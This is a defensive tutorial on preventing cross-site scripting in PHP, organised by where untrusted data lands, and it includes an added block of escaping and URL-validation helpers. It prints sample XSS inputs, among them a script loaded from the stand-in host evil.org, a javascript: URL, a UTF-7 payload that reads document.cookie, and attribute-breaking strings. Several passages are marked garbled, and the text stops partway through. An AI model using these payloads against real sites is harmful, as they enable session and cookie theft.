By default, htmlspecialchars($str) converts only the four characters & " < >.
If the ENT_QUOTES flag is given, i.e. htmlspecialchars($str, ENT_QUOTES), single quotes are converted as well.
If the ENT_NOQUOTES flag is given, neither kind of quote is converted: htmlspecialchars($str, ENT_NOQUOTES) converts only & < >.
XSS attacks and defenses by data location
Which XSS attack is possible, and which defense is needed, depends on where the untrusted data ends up: in the HTML document or inside JavaScript code. The cases are analysed one by one below.
HTML tag attributes
In Web applications, HTML tag attributes such as "input", "style" and "color" are frequently filled with user-supplied data; the examples below use the "value" attribute of an "input" tag.
Example 1
<form…><INPUT type=text name="msg" id="msg" size=10 maxlength=8 value="<?= $msg?>"></form>
XSS attack input:
Hello"><script>evil_script()</script>
After substitution
After $msg is replaced with the XSS attack input, the page becomes:
<form…><INPUT type=text name="msg" id="msg" size=10 maxlength=8 value="Hello"><script>evil_script()</script>"></form>
Example 2
<form…><INPUT type=text name="msg" id="msg" size=10 maxlength=8 value=<?= $msg?>></form>
XSS attack input:
Hello onmouseover=evil_script()
After substitution
After $msg is replaced with the XSS attack input, the page becomes:
<form…><INPUT type=text name="msg" id="msg" size=10 maxlength=8 value=Hello onmouseover=evil_script()></form>
Analysis
In example 1 the XSS attack input contains the HTML special characters < > ".
In example 2 the XSS attack input contains no HTML special characters at all; the attack works because the "value" attribute of the HTML tag is not enclosed in quotes.
Defense
Use htmlspecialchars($str, ENT_QUOTES) to convert all five HTML special characters < > & ' ", and always enclose attribute values in quotes, e.g.:
<form…><INPUT type=text name="msg" id="msg" size=10 maxlength=8 value="<?= htmlspecialchars($msg, ENT_QUOTES) ?>"></form>
Note
The value of an input's value attribute is usually stored and displayed again later. Converting the five HTML special characters covers this attribute context only; the same data may be output again in other HTML contexts, each of which needs its own treatment [the original text of this note is partly garbled]:
1. when the stored data is displayed again elsewhere [garbled in source];
2. when the data is placed into JavaScript code [garbled in source].
HTML tag content
Example
<b>Welcome <?= $welcome_msg?></b>
XSS attack input:
<script>evil_script()</script>
After substitution
After $welcome_msg is replaced with the XSS attack input:
<b>Welcome <script>evil_script()</script></b>
Analysis
Inside HTML tag content, < and > delimit tags and & introduces an entity, so the three characters < > & must be converted.
Defense
Convert the HTML special characters with htmlspecialchars(); for tag content, ENT_NOQUOTES (which converts < > &) is sufficient, e.g.:
<b>Welcome <?= htmlspecialchars($welcome_msg, ENT_NOQUOTES) ?></b>
URL attributes
Tags such as Script/Style/Img/ActiveX/Applet/Frameset… load resources from the URL in their src or href attribute; when these URLs come from user input they must be checked [the original sentence is partly garbled].
Example 1
<script src="<?= $script_url ?>">
XSS attack input:
http://evil.org/evil.js
After substitution
After $script_url is replaced with the XSS attack input:
<script src="http://evil.org/evil.js">
Example 2
<img src="<?= $img_url ?>">
XSS attack input:
javascript:evil_script()
After substitution
After $img_url is replaced with the XSS attack input:
<img src="javascript:evil_script()">
Analysis
Neither attack input contains an HTML special character, so converting special characters does not help: the attribute expects a URL, and the application must check that the supplied value is a valid URL of the kind it intends to use before placing it in the page [the rest of the analysis is garbled in the source].
Character encoding
If the page's character set is declared neither in the content-type header nor in a meta tag, the browser is left to guess it [partly garbled in source]. For example, the UTF-7 encoding of <script>alert(document.cookie)</script> is:
+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-
If the string +ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4- appears somewhere in such a page, IE automatically detects the content as UTF-7, decodes it, and the script runs.
Defense
Declare the page's character encoding explicitly:
<meta http-equiv=content-type content="text/html; charset=UTF-8">
JavaScript event handler attributes
JavaScript event handler attributes such as onClick/onLoad/onError/onMouseOver/… contain JavaScript code, which may embed user-supplied data.
Example
<input type="button" value="go to" onClick='goto_url("<?= $target_url ?>");'>
XSS attack input:
foo");evil_script("
After substitution
The attribute value is JavaScript code inside an HTML attribute; after $target_url is replaced with the XSS attack input:
<input type="button" value="go to" onClick='goto_url("foo");evil_script("");'>
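As an added example (not code from the original article), one PHP helper per output context discussed above: attribute values, tag content, URL attributes and strings inside event handlers, each run over the article's own attack inputs. The function names, the accepted URL schemes and the sample URLs are my assumptions.

```php
<?php
// Added example: one helper per output context from the article above.
// Function names, the accepted URL schemes and the sample URLs are assumptions.

// HTML attribute value: convert all five special characters; the caller must
// still put the value inside quotes.
function esc_attr(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// HTML tag content: converting < > & is enough here, quotes are harmless.
function esc_text(string $s): string {
    return htmlspecialchars($s, ENT_NOQUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// URL attribute (src/href): escaping cannot help, so validate the URL itself.
// Only absolute http/https URLs with a host are accepted (assumed policy).
function safe_url(string $s): ?string {
    $p = parse_url(trim($s));
    if ($p === false || !isset($p['scheme'], $p['host'])) return null;
    return in_array(strtolower($p['scheme']), ['http', 'https'], true) ? $s : null;
}

// String inside a JavaScript event handler: json_encode yields a JS string
// literal, and the HEX flags encode < > & ' " so the literal can end neither
// the attribute nor the script; the caller then escapes it as an attribute.
function esc_js_string(string $s): string {
    $j = json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return $j === false ? '""' : $j;   // invalid UTF-8 becomes an empty literal
}

// The article's attack inputs, each rendered through the matching helper.
$msg = 'Hello"><script>evil_script()</script>';
echo '<input type="text" name="msg" value="' . esc_attr($msg) . '">' . "\n";
$welcome_msg = '<script>evil_script()</script>';
echo '<b>Welcome ' . esc_text($welcome_msg) . '</b>' . "\n";

// Constructed sample URLs: the first is accepted, the second rejected.
foreach (['http://example.com/app.js', 'javascript:evil_script()'] as $url) {
    $ok = safe_url($url);
    echo $ok === null ? 'rejected: ' . esc_text($url) . "\n"
                      : '<script src="' . esc_attr($ok) . '"></script>' . "\n";
}

$target_url = 'foo");evil_script("';
echo '<input type="button" value="go to" onclick=\'goto_url('
    . esc_attr(esc_js_string($target_url)) . ');\'>' . "\n";
```

The order matters for the event handler: the value is first made a JavaScript string literal and only then escaped as an HTML attribute, because the browser decodes the attribute before the script engine ever sees it.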
The data here is located inside JavaScript code [the remainder of the page is missing from the source].